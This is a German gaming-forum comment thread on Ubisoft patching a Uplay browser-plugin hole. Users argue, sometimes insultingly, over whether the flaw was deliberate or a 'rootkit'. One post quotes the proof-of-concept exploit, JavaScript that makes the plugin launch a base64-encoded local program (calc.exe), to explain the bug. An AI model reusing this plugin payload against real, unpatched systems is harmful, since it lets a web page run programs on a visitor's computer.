• Aktualisierte Forenregeln

    Eine kleine Änderung hat es im Bereich Forenregeln unter Abschnitt 2 gegeben, wo wir nun explizit darauf verweisen, dass Forenkommentare in unserer Heftrubrik Leserbriefe landen können.

    Forenregeln


    Vielen Dank

  • Kritk / Fragen / Anregungen zu Artikeln

    Wenn ihr Kritik, Fragen oder Anregungen zu unseren Artikeln habt, dann könnt ihr diese nun in das entsprechende Forum packen. Vor allem Fehler in Artikeln gehören da rein, damit sie dort besser gesehen und bearbeitet werden können.

    Bitte beachtet dort den Eingangspost, der vorgibt, wie der Thread zu benutzen ist: Danke!

Uplay-Exploit: Ubisoft veröffentlicht Patch gegen Sicherheitslücke

icon1zed

icon1zed

Stille/r Leser/in
Mitglied seit
18.11.2011
Beiträge
12
Reaktionspunkte
1
Jetzt ist Deine Meinung zu Uplay-Exploit: Ubisoft veröffentlicht Patch gegen Sicherheitslücke gefragt.


Bitte beachtet: Der Kommentarbereich wird gemäß der Forenregeln moderiert.


arrow_right.gif
Zum Artikel: Uplay-Exploit: Ubisoft veröffentlicht Patch gegen Sicherheitslücke
 
KillerBommel schrieb:
danke ubisoft für denn schnellen patch
Zum Vergrößern anklicken....

Sonst geht es dir noch gut?
Die hauen dir mit voller Absicht eine Sicherheitslücke in den Rechner und du bedankst dich, dass sie diese ohne weiteren Kommentar wieder schliessen.

Das nenne ich den Perfketen Kunden.
Man lässt sich fi**en und bedankt sich dafür.
 
Sleipnir4 schrieb:
Sonst geht es dir noch gut?
Die hauen dir mit voller Absicht eine Sicherheitslücke in den Rechner und du bedankst dich, dass sie diese ohne weiteren Kommentar wieder schliessen.
Zum Vergrößern anklicken....
Bitte was? Mit voller Absicht? :B

Genau, weil Ubisoft sicherlich ein Interesse daran hat, dass man über das uPlay Plugin im Browser bestimmte Programme starten darf.
Meinst du nicht, dass Ubisoft ihren eigenen Launcher hätten dafür benutzen bzw. modifizieren können, wenn sie ein Rootkit implementieren wollen würden?

Was man Ubisoft sicherlich vorwerfen kann, dass das schlecht programmiert und designed wurde, aber von voller Absicht hier zu reden ist weit hergeholt.
 
Ich glaube nicht daran, dass es sich bei diesem Rootkit um einen "Fehler" handelt. Ubisoft ist nunmal eine kriminelle Vereinigung mit dem Ziel der eigenen Bereicherung durch Verbraucherrechtsverletzungen, da passt eine solche Software gut ins Bild.
 
Meckermann schrieb:
Ich glaube nicht daran, dass es sich bei diesem Rootkit um einen "Fehler" handelt. Ubisoft ist nunmal eine kriminelle Vereinigung mit dem Ziel der eigenen Bereicherung durch Verbraucherrechtsverletzungen, da passt eine solche Software gut ins Bild.
Zum Vergrößern anklicken....
:B

Ja, genau ... aber darf ich dir eine Frage stellen: wie genau bereichert sich Ubisoft jetzt daran bzw. damit?

Lass mich raten: da werden bestimmt Kreditkarteninformationen und/oder Bankverbindungen bzw. Online-Banking mitgeschnitten, an Ubisoft übertragen und die Leben in Saus & Braus mit den Mrd. ihrer Kunden?!

./facepalm
 
Meinst du nicht, dass es für eine schlechte Programmierung oder einen schlichten Fehler etwas zu einfach ist, die entstandene Lücke auszunutzen?
Meinst du nicht, dass der Patch etwas zu schnell gekommen ist, wenn man bis gestern von der Lücke nichts gewusst hat?
 
Sleipnir4 schrieb:
Meinst du nicht, dass es für eine schlechte Programmierung oder einen schlichten Fehler etwas zu einfach ist, die entstandene Lücke auszunutzen?
Meinst du nicht, dass der Patch etwas zu schnell gekommen ist, wenn man bis gestern von der Lücke nichts gewusst hat?
Zum Vergrößern anklicken....
Gerade weil der Exploit so 'dämlich' war, konnte man ihn relativ fix beheben. Ehrlich gesagt verwundert es mich, warum das ganze so lange gedauert hat?!

Aber nochmal die Frage an dich: warum so ein Exploit in ein Browser-Plugin mit Absicht implementieren, wenn die uPlay Software viel mehr Möglichkeiten bietet?

Vorallem darf man nicht vergessen, dass es ein leichtes ist und war, auch vor dem Patch, das Plugin zu deaktivieren?!

Übrigens ist die PCG News absoluter Käse, das Plugin beinhaltet kein Rootkit, sondern bietet Angreifern (!) über eine präparierte Internetseite die Möglichkeit ein Programm, was bereits auf dem PC des Users ist, auszuführen. Rootkit ist dann doch was komplett anderes ... :S
 
Zuletzt bearbeitet:
Rabowke schrieb:
:B

Ja, genau ... aber darf ich dir eine Frage stellen: wie genau bereichert sich Ubisoft jetzt daran bzw. damit?

Lass mich raten: da werden bestimmt Kreditkarteninformationen und/oder Bankverbindungen bzw. Online-Banking mitgeschnitten, an Ubisoft übertragen und die Leben in Saus & Braus mit den Mrd. ihrer Kunden?!
Zum Vergrößern anklicken....

Nö, da wird aber z.B. durch Kontenbindung der gesetzlich erlaubte Weiterverkauf soweit es geht verunmöglicht, mit der klaren Absicht auf Kosten des Endverbrauchers den Gewinn zu maximieren. Das ist legaler Diebstahl. Möglicherweise sollte mit einem solchen Rootkit gegen Drittanbieter-Software vorgegangen werden, mit der Gegenmaßnahmen möglich wären, z.B. Emulationssoftware. Das war bei einem anderen Rootkit (Securom) eines rivalisierenden Kartells ja auch der Fall.

Aber nochmal die Frage an dich: warum so ein Exploit in ein Browser-Plugin mit Absicht implementieren, wenn die uPlay Software viel mehr Möglichkeiten bietet?
Zum Vergrößern anklicken....
Wer sagt, dass da nicht auch was drin ist?
 
Meckermann schrieb:
Ich glaube nicht daran, dass es sich bei diesem Rootkit um einen "Fehler" handelt. Ubisoft ist nunmal eine kriminelle Vereinigung mit dem Ziel der eigenen Bereicherung durch Verbraucherrechtsverletzungen, da passt eine solche Software gut ins Bild.
Zum Vergrößern anklicken....
Haha geil, made my day :-D
Es soll da draußen ja wirklich Leute geben die so einen Müll ernsthaft glauben :B
 
Meckermann schrieb:
Nö, da wird aber z.B. durch Kontenbindung der gesetzlich erlaubte Weiterverkauf soweit es geht verunmöglicht, mit der klaren Absicht auf Kosten des Endverbrauchers den Gewinn zu maximieren. Das ist legaler Diebstahl. Möglicherweise sollte mit einem solchen Rootkit gegen Drittanbieter-Software vorgegangen werden, mit der Gegenmaßnahmen möglich wären, z.B. Emulationssoftware. Das war bei einem anderen Rootkit (Securom) eines rivalisierenden Kartells ja auch der Fall.
Zum Vergrößern anklicken....

Don't klugscheiß THE Klugscheißer
Ja ne is klar, dazu brauch man ja natürlich so eine Funktion, mei Junge, pass ja auf das ein Aluhut nicht verrutscht, sonst kann Ubisoft mit der Funktion über das WLAN deine Gedanken auslesen

Außerdem, wenn ich die Wahl habe bei einem mit diesem Namen und Rabowke, ich glaube ich geben dann dem mit dem Intelligenteren Nick per se eher Recht

P.S. Ach ja, man sollte nicht auf gefährliches Halbwissen zurückgreifen wenn man über Rootkits redet, denn wenn wird SecuROM "nur" als Rootkit-ähnlich kritisiert
 
Zuletzt bearbeitet:
Meckermann schrieb:
Nö, da wird aber z.B. durch Kontenbindung der gesetzlich erlaubte Weiterverkauf soweit es geht verunmöglicht, mit der klaren Absicht auf Kosten des Endverbrauchers den Gewinn zu maximieren.
Zum Vergrößern anklicken....
Hier hast du nicht ganz unrecht, allerdings bezog ich mich auf meine Frage bzgl. Bereichern auf die Implementierung des angeblichen Rootkits. Das macht nämlich, vorallem in Hinblick auf die Gewinnmaximierung, keinen Sinn. %)

Denn dieser Exploit ist so dämlich und so leicht zu finden, dass Ubisoft sich hätte im Klaren sein müssen, unter berücksichtigung der Fehler wurde mit Absicht implementiert, dass das negative PR Echo nicht wirklich dienlich ist.

Das ist legaler Diebstahl.
Zum Vergrößern anklicken....
Das ist Unsinn.

Möglicherweise sollte mit einem solchen Rootkit gegen Drittanbieter-Software vorgegangen werden, mit der Gegenmaßnahmen möglich wären, z.B. Emulationssoftware. Das war bei einem anderen Rootkit (Securom) eines rivalisierenden Kartells ja auch der Fall.
Zum Vergrößern anklicken....
Du hast echt keine Ahnung wovon du redest, oder? Es ist kein Rootkit, wie oft noch? SecuROM selbst ist schon grenzwertiger, schließlich handelt es sich hierbei um einen Ring0 Treiber, der wirklich nativen Zugriff auf alle Daten des Betriebssystem hat ... aber:

SecuROM wurde nicht erst seit gestern geknackt. Es wurde bereits "komplett" reversed und bislang habe ich nichts, aber auch garnichts über Rootkit Möglichkeiten gelesen, des weiteren ist mir auch kein Exploit bekannt, welches auf SecuROM aufbaut. Aber ich lass mich hier gerne eines besseren belehren.

Das ist übrigens der Exploit:
Code: 
x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

$ printf "C:\\WINDOWS\\SYSTEM32\\CALC.EXE" | base64
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ==

Vllt. leuchtet es dir jetzt ein, dass wir hier weit entfernt von einem Rootkit sind. %)

Wer sagt, dass da nicht auch was drin ist?
Zum Vergrößern anklicken....
Sinnlose Behauptungen und/oder Fragen in den Raum zu stellen ist bissle schwachsinnig. Genauso gut kann in jeder .exe deines Lieblingsspiels eine "rootkit" implementiert sein, in deinem Browser ( Fifo? Opera? ) ... gesunde Skepsis im Internet ist sicherlich von Vorteil, aber Paranoia bzw. Äußerungen ohne technischen Verständnis eher nicht.
 
Enisra schrieb:
Außerdem, wenn ich die Wahl habe bei einem mit diesem Namen und Rabowke, ich glaube ich geben dann dem mit dem Intelligenteren Nick per se eher Recht
Zum Vergrößern anklicken....

Dann sollte ich mir wohl einen Account Names "Einstein" zulegen?

Ich bediene mich hier nur der Sprache der Rechteverwerter (Raubkopierer sind Verbrecher). Wenn die jeden kriminalisieren, der ihnen nicht passt, warum sollte ich das dann anders handhaben?
 
Meckermann schrieb:
Dann sollte ich mir wohl einen Account Names "Einstein" zulegen?

Ich bediene mich hier nur der Sprache der Rechteverwerter (Raubkopierer sind Verbrecher). Wenn die jeden kriminalisieren, der ihnen nicht passt, warum sollte ich das dann anders handhaben?
Zum Vergrößern anklicken....

Dann würde ich eher dem Recht geben dessen Name weniger Größenwahn an den Tag legt ...
Außerdem, wie man sieht, reicht es nicht Wörter wild im Satz zu verteilen, man sollte auch wissen was sie bedeuten
 
Meckermann schrieb:
Ich bediene mich hier nur der Sprache der Rechteverwerter (Raubkopierer sind Verbrecher). Wenn die jeden kriminalisieren, der ihnen nicht passt, warum sollte ich das dann anders handhaben?
Zum Vergrößern anklicken....
Das "Problem" ist nur, dass in diesem Forum auf einem hohen Niveau diskutiert wird. D.h. du wirst von 99,9% der Forenbesucher nie lesen, dass 100% der Raubkopien auch 100% entgangener Gewinn sind etc.pp.

D.h. also, solange jemand mit dir sachlich diskutiert und argumentiert, du an einer ernsthaften Diskussion interessiert bist, solltest du solche, pardon, dümmlichen Äußerungen wie Kartell oder, mein persönlicher Liebling!, "kriminelle Vereinigung mit dem Ziel der eigenen Bereicherung durch Verbraucherrechtsverletzungen" meiden.

Mit solchen Äußerungen kann dich niemand wirklich ernst nehmen.
 
Meckermann schrieb:
Dann sollte ich mir wohl einen Account Names "Einstein" zulegen?

Ich bediene mich hier nur der Sprache der Rechteverwerter (Raubkopierer sind Verbrecher). Wenn die jeden kriminalisieren, der ihnen nicht passt, warum sollte ich das dann anders handhaben?
Zum Vergrößern anklicken....
Weil du hoffentlich möchtest das man dich ernst nimmt und für intelligenter hält als die Leute und Vereinigungen über die du dich aufregst. Wenn du dich auf deren Niveau begibst bist du nämlich nicht besser als sie.
 
Rabowke schrieb:
Das "Problem" ist nur, dass in diesem Forum auf einem hohen Niveau diskutiert wird. D.h. du wirst von 99,9% der Forenbesucher nie lesen, dass 100% der Raubkopien auch 100% entgangener Gewinn sind etc.pp.
Zum Vergrößern anklicken....

Seit wann wird hier "auf hohem Niveau diskutiert"? Ich bin doch noch auf PCGames.de? Ich habe hier in 5 Jahren noch keine niveauvolle Diskussion gesehen, und das ist jetzt ausdrücklich KEINE Ironie...
 
Meckermann schrieb:
Seit wann wird hier "auf hohem Niveau diskutiert"? Ich bin doch noch auf PCGames.de? Ich habe hier in 5 Jahren noch keine niveauvolle Diskussion gesehen, und das ist jetzt ausdrücklich KEINE Ironie...
Zum Vergrößern anklicken....
:rolleyes:

Es ging um das Thema "Raubkopien", darauf bezog sich meine Aussage & mein Beispiel. Da hätte man aber selbst draufkommen.
Aber scheinbar bist du an keiner ernsthaften Diskussion interessiert ... wenn du dich lediglich an diesem Punkt hochziehst & den Rest komplett ignorierst. %)
 
Einloggen o. Registrieren zum Antworten.

Ähnliche Themen

AntonioFunes
Intel-CPUs: Sicherheitslücke Downfall sorgt für Schlagzeilen
Antworten
1
Aufrufe
223
Kellykiller
K
SimonHoffmann99
Der nächste Hackerangriff? Ubisoft schrammte womöglich an Mega-Leak vorbei
Antworten
1
Aufrufe
112
StarFox86
S
Icetii
Geht's noch? Ubisoft nervt Gamer mit aufdringlicher Werbung - mitten im Spiel
Antworten
11
Aufrufe
414
LOX-TT
LOX-TT
SimonHoffmann99
Alles anders bei Baldur's Gate 3? Patch 5 veröffentlicht, viele Änderungen
Antworten
0
Aufrufe
177
SimonHoffmann99
SimonHoffmann99
Icetii
Abzocke? Luxusmarke Tiffany veröffentlicht unfassbar teuren Pokémon-Schmuck
Antworten
0
Aufrufe
133
Icetii
Icetii
Oben Unten
Zurück